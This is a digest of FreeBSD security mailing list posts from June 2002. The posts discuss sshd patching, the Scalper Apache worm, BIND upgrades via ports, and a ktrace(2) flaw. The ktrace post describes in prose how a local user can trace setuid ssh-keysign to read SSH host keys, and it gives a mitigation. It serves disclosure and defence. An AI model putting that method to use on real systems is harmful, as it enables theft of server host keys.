From owner-freebsd-security Sun Jun 30 3:30:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9EFA637B401; Sun, 30 Jun 2002 03:30:30 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id A40E543E1D; Sun, 30 Jun 2002 03:30:29 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 8BBC55361; Sun, 30 Jun 2002 12:30:27 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Scott Gerhardt Cc: FreeBSD , Subject: Re: Patching sshd References: From: Dag-Erling Smorgrav Date: 30 Jun 2002 12:30:26 +0200 In-Reply-To: Message-ID: Lines: 10 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Scott Gerhardt writes: > Trying to patch my system for fix this apparent sshd vulnerability. > > I tried patching my 4.5-Release box as outlined in #2 below with no luck. That patch is for a different hole. Check the date on the SA. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 5:46:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D6EEB37B401 for ; Sun, 30 Jun 2002 05:46:51 -0700 (PDT) Received: from backup.af.speednet.com.au (afgate.speednet.com.au [203.57.65.244]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7BB0543E1D for ; Sun, 30 Jun 2002 05:46:49 -0700 (PDT) (envelope-from andyf@speednet.com.au) Received: from backup.af.speednet.com.au (andyf@backup.af.speednet.com.au [172.22.2.4]) by backup.af.speednet.com.au (8.11.6/8.11.6) with ESMTP id g5UCkdU42909; Sun, 30 Jun 2002 22:46:40 +1000 (EST) (envelope-from andyf@speednet.com.au) Date: Sun, 30 Jun 2002 22:46:37 +1000 (EST) From: Andy Farkas X-X-Sender: To: Kent Stewart Cc: Subject: Re: FreeBSD.Scalper.Worm In-Reply-To: <3D1E9CDD.6050507@owt.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, 29 Jun 2002, Kent Stewart wrote: > One of the people sending mail to -docs, pointed me to > > http://securityresponse.symantec.com/avcenter/venc/data/freebsd.scalper.worm.html > > It looks like more exposure needs to be provided via the web site and etc. > > Kent > > -- > Kent Stewart > Richland, WA > > http://users.owt.com/kstewart/index.html > Looks like this worm can be stopped by having /tmp mounted noexec. -- :{ andyf@speednet.com.au Andy Farkas System Administrator Speednet Communications http://www.speednet.com.au/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 7:17: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 432B937B400 for ; Sun, 30 Jun 2002 07:17:00 -0700 (PDT) Received: from mail.seattleFenix.net (sense-sea-MegaSub-1-501.oz.net [216.39.145.247]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9D21943E13 for ; Sun, 30 Jun 2002 07:16:59 -0700 (PDT) (envelope-from roo@mail.seattleFenix.net) Received: (from roo@localhost) by mail.seattleFenix.net (8.11.6/8.11.6) id g5UEI3Z24722; Sun, 30 Jun 2002 07:18:03 -0700 (PDT) (envelope-from roo) Date: Sun, 30 Jun 2002 07:18:03 -0700 From: Benjamin Krueger To: Andy Farkas Cc: Kent Stewart , security@FreeBSD.ORG Subject: Re: FreeBSD.Scalper.Worm Message-ID: <20020630071803.B23168@mail.seattleFenix.net> References: <3D1E9CDD.6050507@owt.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from andyf@speednet.com.au on Sun, Jun 30, 2002 at 10:46:37PM +1000 X-PGP-Key: http://www.macguire.net/benjamin/public_key.asc Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org * Andy Farkas (andyf@speednet.com.au) [020630 05:51]: > On Sat, 29 Jun 2002, Kent Stewart wrote: > > > One of the people sending mail to -docs, pointed me to > > > > http://securityresponse.symantec.com/avcenter/venc/data/freebsd.scalper.worm.html > > > > It looks like more exposure needs to be provided via the web site and etc. > > > > Kent > > > > -- > > Kent Stewart > > Richland, WA > > > > http://users.owt.com/kstewart/index.html > > > > Looks like this worm can be stopped by having /tmp mounted noexec. Or running a non-vulnerable version of Apache. > -- > > :{ andyf@speednet.com.au > > Andy Farkas > System Administrator > Speednet Communications > http://www.speednet.com.au/ -- Benjamin Krueger "Life is far too important a thing ever to talk seriously about." - Oscar Wilde (1854 - 1900) ---------------------------------------------------------------- Send mail w/ subject 'send public key' or query for (0x251A4B18) Fingerprint = A642 F299 C1C1 C828 F186 A851 CFF0 7711 251A 4B18 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 7:28:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 97BB637B400 for ; Sun, 30 Jun 2002 07:28:49 -0700 (PDT) Received: from spitfire.velocet.net (spitfire.velocet.net [216.138.223.227]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1700043E09 for ; Sun, 30 Jun 2002 07:28:49 -0700 (PDT) (envelope-from steve@nomad.tor.lets.net) Received: from nomad.tor.lets.net (H74.C220.tor.velocet.net [216.138.220.74]) by spitfire.velocet.net (Postfix) with SMTP id 13E7DFB4793 for ; Sun, 30 Jun 2002 14:28:34 +0000 (GMT) Received: (qmail 33455 invoked by uid 1001); 30 Jun 2002 14:23:39 -0000 Date: Sun, 30 Jun 2002 10:23:39 -0400 From: Steve Shorter To: "Sean J. Schluntz" Cc: freebsd-security@freebsd.org Subject: Re: Security Check Diffs Question Message-ID: <20020630102339.A33450@nomad.lets.net> References: <200107242341.f6ONfpi99078@cdrrdslgw2poolA156.cdrr.uswest.net> <21707.1025344137@greywolf.workofstone.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <21707.1025344137@greywolf.workofstone.net>; from schluntz@workofstone.com on Sat, Jun 29, 2002 at 02:48:57AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, Jun 29, 2002 at 02:48:57AM -0700, Sean J. Schluntz wrote: > > Problem with that is it doesn't work in commercial envrionments unless > you pay the fee for the commercial version of Tripwire. (excepting > the freeware version for Linux only Tripwire) the public tripwire > is only legal to put one copy on your network. Huh? The opensource version is GPL'd. Builds no problem on FreeBSD. The latest might even be in ports. -steve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 7:54:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AA75C37B400 for ; Sun, 30 Jun 2002 07:54:54 -0700 (PDT) Received: from rutger.owt.com (rutger.owt.com [204.118.6.16]) by mx1.FreeBSD.org (Postfix) with ESMTP id 160AD43E09 for ; Sun, 30 Jun 2002 07:54:54 -0700 (PDT) (envelope-from kstewart@owt.com) Received: from owt.com (owt-207-41-94-232.owt.com [207.41.94.232]) by rutger.owt.com (8.9.3/8.9.3) with ESMTP id HAA10036; Sun, 30 Jun 2002 07:54:46 -0700 Message-ID: <3D1F1BB5.6040807@owt.com> Date: Sun, 30 Jun 2002 07:54:45 -0700 From: Kent Stewart User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.4.1) Gecko/20020314 Netscape6/6.2.2 X-Accept-Language: en-us, es-mx MIME-Version: 1.0 To: Benjamin Krueger Cc: Andy Farkas , security@FreeBSD.ORG Subject: Re: FreeBSD.Scalper.Worm References: <3D1E9CDD.6050507@owt.com> <20020630071803.B23168@mail.seattleFenix.net> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Benjamin Krueger wrote: > * Andy Farkas (andyf@speednet.com.au) [020630 05:51]: > >>On Sat, 29 Jun 2002, Kent Stewart wrote: >> >> >>>One of the people sending mail to -docs, pointed me to >>> >>>http://securityresponse.symantec.com/avcenter/venc/data/freebsd.scalper.worm.html >>> >>>It looks like more exposure needs to be provided via the web site and etc. >>> >>>Kent >>> >>> >>Looks like this worm can be stopped by having /tmp mounted noexec. >> > > Or running a non-vulnerable version of Apache. That was my choice. I also upgraded from 1.3.24 to 2.0.39. I figured that it was time. I checked with people I knew and one of them had not upgraded Apache. He had waited until an application to take andvantage of Apache's hole and targeting FreeBSD had arrived. I figure there are more. Kent. -- Kent Stewart Richland, WA http://users.owt.com/kstewart/index.html To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 10:24:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5530837B401 for ; Sun, 30 Jun 2002 10:24:53 -0700 (PDT) Received: from mail.dada.it (mail4.dada.it [195.110.96.52]) by mx1.FreeBSD.org (Postfix) with SMTP id 3EF9C43E09 for ; Sun, 30 Jun 2002 10:24:51 -0700 (PDT) (envelope-from ale@unixmania.net) Received: (qmail 27429 invoked from network); 30 Jun 2002 17:24:44 -0000 Received: from unknown (HELO libero.sunshine.ale) (195.110.114.252) by mail.dada.it with SMTP; 30 Jun 2002 17:24:44 -0000 Received: by libero.sunshine.ale (Postfix, from userid 1001) id 5A3275F87; Sun, 30 Jun 2002 19:24:40 +0200 (CEST) Date: Sun, 30 Jun 2002 19:24:40 +0200 From: Alessandro de Manzano To: Doug Barton Cc: John Long , security@FreeBSD.org Subject: Re: named 8.3.2-T1B vulnerable? Message-ID: <20020630192440.A18140@libero.sunshine.ale> Reply-To: Alessandro de Manzano References: <5.1.0.14.2.20020629142257.0221e050@mail.sstec.com> <20020629170827.K5428-100000@master.gorean.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020629170827.K5428-100000@master.gorean.org>; from DougB@FreeBSD.org on Sat, Jun 29, 2002 at 05:15:42PM -0700 X-Operating-System: FreeBSD 4.6-STABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, Jun 29, 2002 at 05:15:42PM -0700, Doug Barton wrote: Hi! > should be using 8.3.3 if you're using BIND 8. You can build the bind8 port > with: > > make clean ; make -DPORT_REPLACES_BASE_BIND8 install > > and it will update the version of BIND on your system. You could also > leave off the flag if you'd rather have the new bind in /usr/local, but > 8.3.2-T1B had some icky bugs so I recommend just writing over it to be > safe. I've a question about replacing with PORT_REPLACES_BASE_BIND8. If today I install BIND 8.3.3 from the port with that option it will overwrite the system one but next time I'll do a buildworld / installworld I'll get again 8.3.2-T1B or whatever RELENG_4(_6) will have that time.. right ? More, I'll get an entry in the installed packages database for BIND 8.3.3 that is "dangerous", since if I'll ever pkg_delete it I'll lost the real/overwritten BIND... Is possible to "make install" it without making an entry in pkgdb ? > to RELENG_4. I doubt that the security officer team will want to import > BIND 8.3.3 into any of the RELENG_4_x branches. The port will do the same I'll hope yes, since the security fixes are important, IMHO... Thanks in advance ! -- bye! Ale To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 11: 9:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BEA0837B401 for ; Sun, 30 Jun 2002 11:09:24 -0700 (PDT) Received: from mail6.mgfairfax.rr.com (fe6.southeast.rr.com [24.93.67.53]) by mx1.FreeBSD.org (Postfix) with ESMTP id CB9DB43E0A for ; Sun, 30 Jun 2002 11:09:23 -0700 (PDT) (envelope-from jeffi@rcn.com) Received: from glasshouse ([68.100.191.91]) by mail6.mgfairfax.rr.com with Microsoft SMTPSVC(5.5.1877.757.75); Sun, 30 Jun 2002 14:09:16 -0400 Message-ID: <005f01c22061$4f8814b0$f200a8c0@glasshouse> From: "Jeff Ito" To: Cc: "Alessandro de Manzano" References: <5.1.0.14.2.20020629142257.0221e050@mail.sstec.com> <20020629170827.K5428-100000@master.gorean.org> <20020630192440.A18140@libero.sunshine.ale> Subject: Re: named 8.3.2-T1B vulnerable? Date: Sun, 30 Jun 2002 14:09:42 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > I've a question about replacing with PORT_REPLACES_BASE_BIND8. > > If today I install BIND 8.3.3 from the port with that option it will > overwrite the system one but next time I'll do a buildworld / > installworld I'll get again 8.3.2-T1B or whatever RELENG_4(_6) will > have that time.. right ? Yes, see /etc/make.conf to prevent this #NO_BIND= true # do not build BIND > More, I'll get an entry in the installed packages database for BIND > 8.3.3 that is "dangerous", since if I'll ever pkg_delete it I'll lost > the real/overwritten BIND... > > Is possible to "make install" it without making an entry in pkgdb ? > pkg_add has -R, I'm not certain about doing the same with make install, but you can always delete the entry from /var/db/pkg/ -- > > bye! > > Ale > HTH, Jeff To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 11:17:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 023F937B400 for ; Sun, 30 Jun 2002 11:17:29 -0700 (PDT) Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by mx1.FreeBSD.org (Postfix) with ESMTP id F3DB643E09 for ; Sun, 30 Jun 2002 11:17:27 -0700 (PDT) (envelope-from avalon@caligula.anu.edu.au) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id EAA05639 for security@freebsd.org; Mon, 1 Jul 2002 04:17:25 +1000 (EST) From: Darren Reed Message-Id: <200206301817.EAA05639@caligula.anu.edu.au> Subject: security risk: ktrace(2) in FreeBSD prior to -current. To: security@freebsd.org Date: Mon, 1 Jul 2002 04:17:22 +1000 (Australia/ACT) X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The bug in ktrace(2) is present in all FreeBSD's that don't have p_candebug() in the kernel. In short, this is 4-stable, etc. What's the risk ? With OpenSSH 3.4, ssh-keysign gets installed setuid-root. Using the ktrace(2) bug, you can ktrace the ssh-keysign process after it resets its uid's and watch it read your ssh host keys, be they RSA or DSA. I'm working on a patch for FreeBSD that doesn't break either FreeBSD or ktrace(2) working the way it should. In the meantime: chmod 555 `which ssh-keysign` Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 13: 8:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 64BCE37B400 for ; Sun, 30 Jun 2002 13:08:12 -0700 (PDT) Received: from mail.dada.it (mail4.dada.it [195.110.96.52]) by mx1.FreeBSD.org (Postfix) with SMTP id 9392A43E1D for ; Sun, 30 Jun 2002 13:08:10 -0700 (PDT) (envelope-from ale@unixmania.net) Received: (qmail 23543 invoked from network); 30 Jun 2002 20:01:22 -0000 Received: from unknown (HELO libero.sunshine.ale) (195.110.114.252) by mail.dada.it with SMTP; 30 Jun 2002 20:01:22 -0000 Received: by libero.sunshine.ale (Postfix, from userid 1001) id 3BBED5FB3; Sun, 30 Jun 2002 22:01:18 +0200 (CEST) Date: Sun, 30 Jun 2002 22:01:18 +0200 From: Alessandro de Manzano To: Jeff Ito Cc: security@freebsd.org Subject: Re: named 8.3.2-T1B vulnerable? Message-ID: <20020630220118.A20085@libero.sunshine.ale> Reply-To: Alessandro de Manzano References: <5.1.0.14.2.20020629142257.0221e050@mail.sstec.com> <20020629170827.K5428-100000@master.gorean.org> <20020630192440.A18140@libero.sunshine.ale> <005f01c22061$4f8814b0$f200a8c0@glasshouse> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <005f01c22061$4f8814b0$f200a8c0@glasshouse>; from jeffi@rcn.com on Sun, Jun 30, 2002 at 02:09:42PM -0400 X-Operating-System: FreeBSD 4.6-STABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, Jun 30, 2002 at 02:09:42PM -0400, Jeff Ito wrote: > see /etc/make.conf to prevent this > > #NO_BIND= true # do not build BIND yeah, I forgot it ;) > > Is possible to "make install" it without making an entry in pkgdb ? > > > > pkg_add has -R, I'm not certain about doing the same with make install, > but you can always delete the entry from /var/db/pkg/ mmm... yes, better than nothing :) I'll do so, I'll install port bind 8.3.3 over system bind and I'll 'remove' its package info from /var/db/pkg many thanks! -- bye! Ale To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 13:37:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A249B37B400 for ; Sun, 30 Jun 2002 13:37:06 -0700 (PDT) Received: from mail-relay1.yahoo.com (mail-relay1.yahoo.com [216.145.48.34]) by mx1.FreeBSD.org (Postfix) with ESMTP id 411C143E1D for ; Sun, 30 Jun 2002 13:37:06 -0700 (PDT) (envelope-from DougB@FreeBSD.org) Received: from FreeBSD.org (12-234-90-219.client.attbi.com [12.234.90.219]) by mail-relay1.yahoo.com (Postfix) with ESMTP id 810B18B5D6; Sun, 30 Jun 2002 13:37:04 -0700 (PDT) Message-ID: <3D1F6BEF.582E44D9@FreeBSD.org> Date: Sun, 30 Jun 2002 13:37:03 -0700 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.79 [en] (X11; U; FreeBSD 4.6-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Alessandro de Manzano Cc: John Long , security@FreeBSD.org Subject: Re: named 8.3.2-T1B vulnerable? References: <5.1.0.14.2.20020629142257.0221e050@mail.sstec.com> <20020629170827.K5428-100000@master.gorean.org> <20020630192440.A18140@libero.sunshine.ale> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Alessandro de Manzano wrote: > I've a question about replacing with PORT_REPLACES_BASE_BIND8. > > If today I install BIND 8.3.3 from the port with that option it will > overwrite the system one but next time I'll do a buildworld / > installworld I'll get again 8.3.2-T1B or whatever RELENG_4(_6) will > have that time.. right ? Correct. There is currently a make.conf option for NO_BIND. In addition, some of us are working on a more thorough solution which will add some magic to the bsd.*.mk files so that you can put PORT_REPLACES_BASE_FOO in your /etc/make.conf, and it will automatically imply NO_FOO as well. Currently I'm testing a final buildworld for the bind 8.3.3 import on -current. Once that's done, I'll be sending some patches and more info on this topic to the freebsd-arch mailing list. > More, I'll get an entry in the installed packages database for BIND > 8.3.3 that is "dangerous", since if I'll ever pkg_delete it I'll lost > the real/overwritten BIND... Yep. One of the things I'm adding to my little patch is to change the name of the port from foo-version to foo-system-version when installing to give you a clue as to what's about to happen. BUT, you are absolutely right in saying that this option is dangerous. However, there are lots of ways to shoot yourself in the foot here... it's up to you to find a better target. :) Also, the system will still run without BIND, unless of course you're using that particular system as a name server. I have been using the "port overwrites base" stuff at Yahoo! for almost a year, and we haven't had any catastrophes yet. Hope this helps, Doug To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 13:47:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C87B037B401 for ; Sun, 30 Jun 2002 13:47:52 -0700 (PDT) Received: from mail-relay1.yahoo.com (mail-relay1.yahoo.com [216.145.48.34]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4791143E0A for ; Sun, 30 Jun 2002 13:47:52 -0700 (PDT) (envelope-from DougB@FreeBSD.org) Received: from FreeBSD.org (12-234-90-219.client.attbi.com [12.234.90.219]) by mail-relay1.yahoo.com (Postfix) with ESMTP id D80728B5CF; Sun, 30 Jun 2002 13:47:51 -0700 (PDT) Message-ID: <3D1F6E77.2C842E5B@FreeBSD.org> Date: Sun, 30 Jun 2002 13:47:51 -0700 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.79 [en] (X11; U; FreeBSD 4.6-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: John Long Cc: security@FreeBSD.ORG Subject: Re: named 8.3.2-T1B vulnerable? References: <5.1.0.14.2.20020629142257.0221e050@mail.sstec.com> <5.1.0.14.2.20020629173206.021c88e0@mail.sstec.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org John Long wrote: > Hello Doug, thanks for the very quick response, Glad to help. > Yes I run 2 primary dns servers > I would rather overwrite the base however is there any downside to this, > now or in the future with the next build world... ? Downside to it? I hope not, I've done it at Yahoo! for almost a year now. :) You should also put 'NO_BIND= true' in your /etc/make.conf to avoid spamming bind on your next buildworld. I left that part out of my previous message, sorry. > With 8.3.2-T1B being so icky, should this subject not be mentioned on the > stable > list and is it not a security problem/potential root hole ( I am sure black > hats are > very busy right now) therefore should it not go into RELENG_4_6 as a -p2? Well, let's be clear. The exploitable parts of the problem are in libc (fixed already) and in libbind from the BIND sources. The latter is seldom, if ever used. I'll leave it up to the SO team to decide, I have no objection to doing the import. However, the main ickiness of that code is performance wise. In fixing some old bugs in 8.3.1, they introduced a few "quirks" that were subsequently fixed before 8.3.2-release. I had some servers testing 8.3.2-prior-to-release code, and they all fell over in various interesting ways. The bugs were fixed before I got around to reporting them though. My personal belief is that people who are actually running name servers should be keeping up with such things, and therefore my saying, "Hey, the code in the base isn't the latest, and isn't recommended, so you should use the port to upgrade" really SHOULD be redundant.... but in the real world, you're probably right. > Finally thanks to all the people/coders involved with open source and > FreeBSD :-) You're welcome. :) Thanks for the kind words... it's actually quite nice to hear once in a while. Doug To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 13:59: 1 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 05F6737B400 for ; Sun, 30 Jun 2002 13:58:57 -0700 (PDT) Received: from mail.dada.it (mail3.dada.it [195.110.96.70]) by mx1.FreeBSD.org (Postfix) with SMTP id 3806243E13 for ; Sun, 30 Jun 2002 13:58:55 -0700 (PDT) (envelope-from ale@unixmania.net) Received: (qmail 28241 invoked from network); 30 Jun 2002 20:58:47 -0000 Received: from unknown (HELO libero.sunshine.ale) (195.110.114.252) by mail.dada.it with SMTP; 30 Jun 2002 20:58:47 -0000 Received: by libero.sunshine.ale (Postfix, from userid 1001) id 7CB195FCE; Sun, 30 Jun 2002 22:58:43 +0200 (CEST) Date: Sun, 30 Jun 2002 22:58:43 +0200 From: Alessandro de Manzano To: Doug Barton Cc: John Long , security@FreeBSD.org Subject: Re: named 8.3.2-T1B vulnerable? Message-ID: <20020630225843.A20498@libero.sunshine.ale> Reply-To: Alessandro de Manzano References: <5.1.0.14.2.20020629142257.0221e050@mail.sstec.com> <20020629170827.K5428-100000@master.gorean.org> <20020630192440.A18140@libero.sunshine.ale> <3D1F6BEF.582E44D9@FreeBSD.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <3D1F6BEF.582E44D9@FreeBSD.org>; from DougB@FreeBSD.org on Sun, Jun 30, 2002 at 01:37:03PM -0700 X-Operating-System: FreeBSD 4.6-STABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, Jun 30, 2002 at 01:37:03PM -0700, Doug Barton wrote: > Correct. There is currently a make.conf option for NO_BIND. In yes, I knew it but I totally forgot about it ;) > addition, some of us are working on a more thorough solution which will > add some magic to the bsd.*.mk files so that you can put > PORT_REPLACES_BASE_FOO in your /etc/make.conf, and it will automatically > imply NO_FOO as well. Currently I'm testing a final buildworld for the yup, should be useful :-) > > More, I'll get an entry in the installed packages database for BIND > > 8.3.3 that is "dangerous", since if I'll ever pkg_delete it I'll lost > > the real/overwritten BIND... > > Yep. One of the things I'm adding to my little patch is to change the > name of the port from foo-version to foo-system-version when installing > to give you a clue as to what's about to happen. BUT, you are absolutely IMHO the current system of -DSOMETHING is good, maybe just a couple of suggestions: use a standard name (PORT_REPLACES_BASE_xxx as you said), maybe it's already this way, I don't know :)) and/or a dialog(1) menu to choose whether overwrite base components or not :) Sometimes people 'forgot' to read into Makefiles to look for every possible -D symbols.. > right in saying that this option is dangerous. However, there are lots > of ways to shoot yourself in the foot here... it's up to you to find a > better target. :) Also, the system will still run without BIND, unless yes, of course :) you're right > of course you're using that particular system as a name server. I have a couple boxes of mine are actually public name servers, so I'll absolutely upgrade them to 8.3.3 tomorrow morning. This evening I upgraded my home box in this way to learn :) > been using the "port overwrites base" stuff at Yahoo! for almost a year, > and we haven't had any catastrophes yet. > > Hope this helps, Yes, defintely! Thanks a lot ! :-) -- bye! Ale To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 15:26:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 60C1E37B401 for ; Sun, 30 Jun 2002 15:26:00 -0700 (PDT) Received: from wiggle.seifried.org (h24-86-92-240.sbm.shawcable.net [24.86.92.240]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1F93F43E0A for ; Sun, 30 Jun 2002 15:25:59 -0700 (PDT) (envelope-from kurt@seifried.org) Received: from chaser (chaser.seifried.org [10.2.0.20]) by wiggle.seifried.org (Postfix) with SMTP id 71A8B3E659 for ; Sun, 30 Jun 2002 16:26:56 -0600 (MDT) Message-ID: <001401c22085$16063540$1400020a@chaser> Reply-To: "Kurt Seifried" From: "Kurt Seifried" To: Subject: Apache Worm Analysis (was Re: Apache worm in the wild) Date: Sun, 30 Jun 2002 16:25:48 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Forwarded by request. -----Original Message----- From: David Endler [mailto:dendler@idefense.com] Sent: Sunday, June 30, 2002 2:09 PM To: bugtraq@securityfocus.com; 